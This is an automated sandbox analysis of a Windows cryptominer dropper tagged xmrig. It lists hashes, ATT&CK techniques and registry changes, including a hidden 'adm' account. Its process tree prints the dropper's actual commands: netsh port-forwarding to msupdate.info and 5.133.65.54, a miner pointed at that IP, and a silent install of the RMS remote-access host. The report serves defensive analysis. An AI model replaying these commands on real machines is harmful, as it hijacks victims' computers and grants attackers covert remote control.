xmrig | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4

Analysis

max time kernel
134s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-05-2022 12:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Size

397KB
MD5

45626e0ba033517e92404779ed548fb1
SHA1

72722ee51dc3cb8be87f35203b0bd41a380c9a52
SHA256

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4
SHA512

9227d419b99cc75921d0a8fc12851954905e49d3ad83d399813ba5d18e5c3171e62c076cd4d8dd9a58e0881bc77b90db0ace80dd932a8048eb037154039f3f15

Score

10^/10

xmrig discovery evasion miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

$77_oracle.exe$77_oracle.exeRMS.exeinstaller.exe

pid process

2372 $77_oracle.exe
4648 $77_oracle.exe
3120 RMS.exe
2228 installer.exe
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2372	$77_oracle.exe
4648	$77_oracle.exe
3120	RMS.exe
2228	installer.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exeRMS.exeinstaller.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	RMS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Windows directory 2 IoCs

Processes:

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe

description	ioc	process
File created	C:\Windows\SoftwareDistribution\config.xml	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid process

3500 NETSTAT.EXE
3136 NETSTAT.EXE
3424 NETSTAT.EXE
4064 NETSTAT.EXE
3748 NETSTAT.EXE
3812 NETSTAT.EXE

pid	process
3500	NETSTAT.EXE
3136	NETSTAT.EXE
3424	NETSTAT.EXE
4064	NETSTAT.EXE
3748	NETSTAT.EXE
3812	NETSTAT.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exeinstaller.exe

pid	process
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe
2228	installer.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

664
664

pid	process
664
664

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Token: SeSecurityPrivilege	228	msiexec.exe
Token: SeDebugPrivilege	3748	NETSTAT.EXE
Token: SeDebugPrivilege	3812	NETSTAT.EXE
Token: SeDebugPrivilege	3500	NETSTAT.EXE
Token: SeLockMemoryPrivilege	2372	$77_oracle.exe
Token: SeLockMemoryPrivilege	2372	$77_oracle.exe
Token: SeDebugPrivilege	3136	NETSTAT.EXE
Token: SeDebugPrivilege	3424	NETSTAT.EXE
Token: SeDebugPrivilege	4064	NETSTAT.EXE
Token: SeLockMemoryPrivilege	4648	$77_oracle.exe
Token: SeLockMemoryPrivilege	4648	$77_oracle.exe
Token: SeShutdownPrivilege	4576	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4576	msiexec.exe
Token: SeSecurityPrivilege	1032	msiexec.exe
Token: SeCreateTokenPrivilege	4576	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4576	msiexec.exe
Token: SeLockMemoryPrivilege	4576	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4576	msiexec.exe
Token: SeMachineAccountPrivilege	4576	msiexec.exe
Token: SeTcbPrivilege	4576	msiexec.exe
Token: SeSecurityPrivilege	4576	msiexec.exe
Token: SeTakeOwnershipPrivilege	4576	msiexec.exe
Token: SeLoadDriverPrivilege	4576	msiexec.exe
Token: SeSystemProfilePrivilege	4576	msiexec.exe
Token: SeSystemtimePrivilege	4576	msiexec.exe
Token: SeProfSingleProcessPrivilege	4576	msiexec.exe
Token: SeIncBasePriorityPrivilege	4576	msiexec.exe
Token: SeCreatePagefilePrivilege	4576	msiexec.exe
Token: SeCreatePermanentPrivilege	4576	msiexec.exe
Token: SeBackupPrivilege	4576	msiexec.exe
Token: SeRestorePrivilege	4576	msiexec.exe
Token: SeShutdownPrivilege	4576	msiexec.exe
Token: SeDebugPrivilege	4576	msiexec.exe
Token: SeAuditPrivilege	4576	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4576	msiexec.exe
Token: SeChangeNotifyPrivilege	4576	msiexec.exe
Token: SeRemoteShutdownPrivilege	4576	msiexec.exe
Token: SeUndockPrivilege	4576	msiexec.exe
Token: SeSyncAgentPrivilege	4576	msiexec.exe
Token: SeEnableDelegationPrivilege	4576	msiexec.exe
Token: SeManageVolumePrivilege	4576	msiexec.exe
Token: SeImpersonatePrivilege	4576	msiexec.exe
Token: SeCreateGlobalPrivilege	4576	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

$77_oracle.exe$77_oracle.exe

pid process

2372 $77_oracle.exe
4648 $77_oracle.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

installer.exe

pid process

2228 installer.exe

pid	process
2372	$77_oracle.exe
4648	$77_oracle.exe

pid	process
2228	installer.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.execsc.exeRMS.exeinstaller.exe

description	pid	process	target process
PID 3384 wrote to memory of 2296	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	csc.exe
PID 3384 wrote to memory of 2296	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	csc.exe
PID 2296 wrote to memory of 4560	2296	csc.exe	cvtres.exe
PID 2296 wrote to memory of 4560	2296	csc.exe	cvtres.exe
PID 3384 wrote to memory of 1492	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	chcp.com
PID 3384 wrote to memory of 1492	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	chcp.com
PID 3384 wrote to memory of 4800	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 4800	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 3748	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3748	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3812	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3812	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3500	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3500	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 4912	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 4912	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 328	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 328	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 1864	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 1864	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 3504	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 3504	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 2664	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 2664	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 2372	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	$77_oracle.exe
PID 3384 wrote to memory of 2372	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	$77_oracle.exe
PID 3384 wrote to memory of 2856	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 2856	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 3136	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3136	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3424	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 3424	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 4064	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 4064	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	NETSTAT.EXE
PID 3384 wrote to memory of 756	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 756	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 5092	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 5092	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 2288	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 2288	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	netsh.exe
PID 3384 wrote to memory of 3120	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	RMS.exe
PID 3384 wrote to memory of 3120	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	RMS.exe
PID 3384 wrote to memory of 3120	3384	0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe	RMS.exe
PID 3120 wrote to memory of 2228	3120	RMS.exe	installer.exe
PID 3120 wrote to memory of 2228	3120	RMS.exe	installer.exe
PID 3120 wrote to memory of 2228	3120	RMS.exe	installer.exe
PID 2228 wrote to memory of 4576	2228	installer.exe	msiexec.exe
PID 2228 wrote to memory of 4576	2228	installer.exe	msiexec.exe
PID 2228 wrote to memory of 4576	2228	installer.exe	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
"C:\Users\Admin\AppData\Local\Temp\0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe"
1⤵
- Checks computer location settings
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:2296

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4FE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB4FD.tmp"
3⤵
PID:4560

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
2⤵
PID:1492

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:4800

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3748

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
2⤵
PID:4912

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:328

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
2⤵
PID:1864

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:3504

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:2664

C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
"C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 1
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2372

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:2856

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4064

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:756

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
2⤵
PID:5092

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\RMS.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3120

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:228

C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4648

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BD88F9647C19DCABFC93C4C4F47249C0
2⤵
PID:4208

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
2⤵
PID:1508

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
2⤵
PID:3588

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
2⤵
PID:1892

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize
1.9MB

MD5
9feb2c3ed2e5390079e4eea98f11a9a8

SHA1
b5cd56f0e474bf45075f5ce80b0f6ecfa4b378f8

SHA256
9baf9cebeab9046da0644494e7cf1f498d2dd0e345ae45c279697e5cd818f80b

SHA512
97216dc921cad3fbeb2d6ebd4b5cdb1654420158e3618bb08d4802e79648cd237bedc3d87146eb911e9c9a3ef757e6f85a9fdcb211560326b59581d2c13b3f1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi
Filesize
7.4MB

MD5
73e578a44265558d3ace212869d43cbb

SHA1
d2c15578def8996ed0ae4a44754055b774b095a7

SHA256
8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

SHA512
fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB4FE.tmp
Filesize
1KB

MD5
709dfc3a899f8127427c5fb788215ab4

SHA1
db7e31d32f16f9e0978d14df17d9160c08065853

SHA256
e6fdacaa5792c0d7146b811df67eb084e774760cd8672007f75be3642060418a

SHA512
aaad5b90af7e0a89b686850641811cc333e436baa86a43a4d5d3528737db6e422a46827f2de62966f66f61c4973fc923fd7a1622d1e8e4d7c5706082211988db

Download Submit
C:\Users\Admin\AppData\Local\Temp\RMS.exe
Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
C:\Users\Admin\AppData\Local\Temp\RMS.exe
Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
C:\Users\Admin\AppData\Local\Temp\config.json
Filesize
3KB

MD5
74fb175e205d74c162df04f8236ec94b

SHA1
57ccfe00ef11556ffa576c74eeecf3730659ae89

SHA256
1fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9

SHA512
8b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830

Download Submit
C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.dll
Filesize
3KB

MD5
b198909a9684d9698aeaa29d9a143616

SHA1
5f9d4bf700b95316880bc52c7a1cf8805f0eeaec

SHA256
ccebfa9d569486728c6b145dd88ad0e7ce02d5e7c8f648b9adf6cdae312541d6

SHA512
